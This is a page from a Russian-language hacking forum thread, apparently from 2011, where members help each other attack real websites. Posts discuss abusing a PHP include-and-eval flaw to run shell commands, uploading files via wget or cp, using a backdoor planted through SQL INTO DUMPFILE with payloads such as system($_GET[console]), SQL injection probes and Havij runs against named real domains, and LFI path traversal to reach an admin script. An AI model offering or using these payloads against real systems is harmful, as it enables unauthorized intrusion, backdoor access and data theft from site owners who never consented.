Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. VertuOzz

    VertuOzz New Member

    Joined:
    8 Sep 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    А можно через cmd залить?
    На команду
    Code:
    find . -type d -perm 777 -print
    ругнулся
    HTML:
    <b>Warning</b>:  include_once() [<a href='function.include'>function.include</a>]: Failed opening 'modules/error_reporting(0);print `find . -type d -perm 777 -print`;///error_reporting(0);print `find . -type d -perm 777 -print`;//.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/xxx/public_html/includes/libs/ss.inc.php</b> on line <b>168</b><br />
    но выдал все папки с правами на записью Какой командой можно залить файл, удаленно или локально?
     
  2. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    27
    Likes Received:
    12
    Reputations:
    7
    Херню не неси
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Есле херня, аргументируй!!! в чем имено,
    cp - это функция копирования, линукса, онаже COPY на пхп, а как вы ее будите использовать это уже другой вопрос, требую аргументировать в чем херня!
     
    _________________________
  4. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    27
    Likes Received:
    12
    Reputations:
    7
    [​IMG]
    Сначала пишешь вставить эвал, а потом юзаешь системные команды(непосресдтвенно через эвал), да еще и с неправильными аргументами...
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp <ЧТО> <КУДА>"
     
    _________________________
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    system \ passthru \ etc => system("cp <ЧТО> <КУДА>");
    Но никак не просто в eval въебать cp.
    Может все-таки не будешь пугать людей?
     
    1 person likes this.
  7. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    27
    Likes Received:
    12
    Reputations:
    7
    И опять бред, ты я смотрю главный распространитель дезинформации тут.
     
    1 person likes this.
  8. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Это LFI, и произвольное выполнение кода(Не команд).

    P.S. Писать не хотел, так как это элементарно, но winstrool попросил разобраться.
     
    #17848 randman, 14 Sep 2011
    Last edited: 15 Sep 2011
    1 person likes this.
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Это и произвольное выполнение кода и LFI. Но мне кажется, что "произвольное выполнение кода" как-то выгоднее нежели LFI, да и говорим мы не о LFI сейчас.
    https://forum.antichat.ru/showpost.php?p=2829300&postcount=18023
    PHP:
    $app $_POST['attachment'];
    ...
    include_once(
    'modules/'.$app.'/'.$app.'.php');
    ...
    $c_run $app.'::ajax_post();';
    ...
    eval(
    $c_run); //EVAL!!1111 Code Execution
    Писать не хотел, так как это элементарно, но Расмус Лердорф попросил разобраться.
     
    #17849 Tigger, 14 Sep 2011
    Last edited: 14 Sep 2011
    2 people like this.
  10. MyGreenLife

    MyGreenLife Member

    Joined:
    27 Nov 2009
    Messages:
    0
    Likes Received:
    9
    Reputations:
    6
    Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
    Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?

    Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
    Спасибо ...
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    php?commanda=system($_GET[console]);&console=ls -la
     
    _________________________
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Боюсь спрашивать, но рискну:
    Как ты залил бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
    Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
     
  13. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    полностью с тобой согласен!
    некоторые много говорят не поделу!
     
  14. MyGreenLife

    MyGreenLife Member

    Joined:
    27 Nov 2009
    Messages:
    0
    Likes Received:
    9
    Reputations:
    6
    Я просто хотел узнать как можно найти доступные папки для записи, ибо бекдор можно залить и если нету прав на запись в диру. Например через модуль булки. За совет спасибо.

    Спасибо.
     
  15. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Помогите со скулью:
    http://nora-m.ru/index/2/product/220+order+by+1--
    ;)
     
  16. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    _http://wow.net.kg/^object=201388 нашел Cookie иньекцию,ввожу данные в Havij пишет что Target is vulnerable,уязвима,но..
    Bypassing illegal union failed! Turning off this feature

    Как решить ?
     
  17. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей...
    инклужу ее...

    Вылазит форма добавления с actionом
    <FORM method=post name=AddNews action='/main.phtml?act=add' enctype='multipart/form-data'>

    поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку.
    меняю action на
    http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
    при добавление новости пишет "невозможно выполнить запрос".
    Что еще можно попробовать сделать?
     
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    скорей всего admnews.phtml инклюдит что-то еще, а так как ты инклюдишь этот скрипт с другой диры, то некоторые скрипты не подгружаются.
     
  19. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    При http://nora-m.ru/index/2/product/220 тоже вылазит ошибка, так что, скорее всего в скрипте отсутствует уязвимость.
    Пардон, ошибся.Пробуй blind инъекцию
     
    #17859 t3cHn0iD, 15 Sep 2011
    Last edited: 15 Sep 2011
  20. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Пролез в бд но выдает все на непонятной кодировке..что можно сделать?
     
Thread Status:
Not open for further replies.